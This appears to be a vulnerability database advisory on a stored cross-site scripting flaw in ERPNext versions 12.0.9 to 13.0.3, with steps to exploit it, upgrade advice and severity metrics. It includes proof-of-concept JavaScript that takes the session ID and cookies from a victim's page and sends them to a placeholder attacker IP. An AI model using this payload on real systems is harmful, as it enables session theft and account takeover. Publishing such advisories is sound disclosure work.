Mend Vulnerability Database
What is a CVE vulnerability ID? What is a WS vulnerability ID?New vulnerability? Tell us about it!
We found results for “”
Date: June 22, 2022
DetailsIn ERPNext, versions v12.0.9--v13.0.3 are vulnerable to Stored Cross-Site-Scripting (XSS), due to user input not being validated properly. A low privileged attacker could inject arbitrary code into input fields when editing his profile.
PoC DetailsLogin as a low application user, go to the ‘My profile’ section under “Settings”, then click on the ‘Edit Profile’ button. Edit ‘Bio’ input field, insert the XSS payload, as can be seen in the POC code section. Now create a file ‘test1.js’ as described in the POC code and set-up a simple http listener. Once a user will login, the payload will get executed and the user’s cookie session will be compromised. Using the captured data the attacker can login as another user.
var re = /\\"sid\\":\\s\\"[0-9a-zA-Z]+\\"/gm;
var te = /[0-9a-zA-Z]+/gm;
var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID.split(':');
getSID = getSID.match(te);
url = 'http://<attacker-ip>:<port>/?sid='+getSID;
var script = document.createElement('script');
script.src = url+"&details= " + document.cookie;
Affected EnvironmentsERPNext versions v12.0.9 through v13.0.3
PreventionUpgrade to ERPNext version 13.1.0
Good to know:
|Attack Vector (AV):||Network|
|Attack Complexity (AC):||Low|
|Privileges Required (PR):||Low|
|User Interaction (UI):||Required|
|Access Vector (AV):||Network|
|Access Complexity (AC):||Medium|